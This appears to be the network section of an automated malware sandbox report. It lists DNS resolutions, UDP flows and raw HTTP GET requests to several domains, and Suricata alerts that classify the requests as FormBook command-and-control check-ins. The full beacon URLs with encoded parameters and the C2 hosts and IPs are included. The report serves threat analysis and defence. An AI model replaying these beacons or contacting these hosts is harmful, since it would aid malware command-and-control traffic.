Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.sarthaksrishticreation.com | 119.18.49.69 | |
| www.gk84.com |
CNAME
gk84.com
|
107.148.223.82 |
| www.gracefullytouchedartistry.com |
CNAME
cdn1.wixdns.net
|
34.149.87.45 |
| www.giallozafferrano.com |
CNAME
giallozafferrano.com
|
62.149.128.45 |
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:59005 239.255.255.250:1900
-
GET
301
http://www.sarthaksrishticreation.com/sy22/?kDHl=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&KtxD=PnCTGx9Pf
REQUEST
RESPONSE
BODY
GET /sy22/?kDHl=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&KtxD=PnCTGx9Pf HTTP/1.1
Host: www.sarthaksrishticreation.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Thu, 21 Sep 2023 09:10:38 GMT
Server: Apache
Location: https://www.sarthaksrishticreation.com/sy22/?kDHl=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&KtxD=PnCTGx9Pf
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
429
http://www.gracefullytouchedartistry.com/sy22/?kDHl=32OyyUZHwqvJixPuiOQtM5MnMYIWhWk0yyAoMHrFdBB4wJvVGBkivZFh4+NGsLP7HahAbSBt&KtxD=PnCTGx9Pf
REQUEST
RESPONSE
BODY
GET /sy22/?kDHl=32OyyUZHwqvJixPuiOQtM5MnMYIWhWk0yyAoMHrFdBB4wJvVGBkivZFh4+NGsLP7HahAbSBt&KtxD=PnCTGx9Pf HTTP/1.1
Host: www.gracefullytouchedartistry.com
Connection: close
HTTP/1.1 429 Too Many Requests
Content-Length: 0
Accept-Ranges: bytes
Date: Thu, 21 Sep 2023 09:11:18 GMT
X-Served-By: cache-hnd18721-HND
X-Cache: MISS
X-Seen-By: yvSunuo/8ld62ehjr5B7kA==
Via: 1.1 google
Connection: close
GET
404
http://www.giallozafferrano.com/sy22/?kDHl=e3Wc7AYKmxnABbA5XplRDASPAW2hX0g2E4j6p3U7Sf2osunLtU3wLL64mGQYR58Cg+KdkSKM&KtxD=PnCTGx9Pf
REQUEST
RESPONSE
BODY
GET /sy22/?kDHl=e3Wc7AYKmxnABbA5XplRDASPAW2hX0g2E4j6p3U7Sf2osunLtU3wLL64mGQYR58Cg+KdkSKM&KtxD=PnCTGx9Pf HTTP/1.1
Host: www.giallozafferrano.com
Connection: close
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 21 Sep 2023 09:11:38 GMT
Connection: close
Content-Length: 5056
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49171 -> 107.148.223.82:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49169 -> 34.149.87.45:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49168 -> 119.18.49.69:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49170 -> 62.149.128.45:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts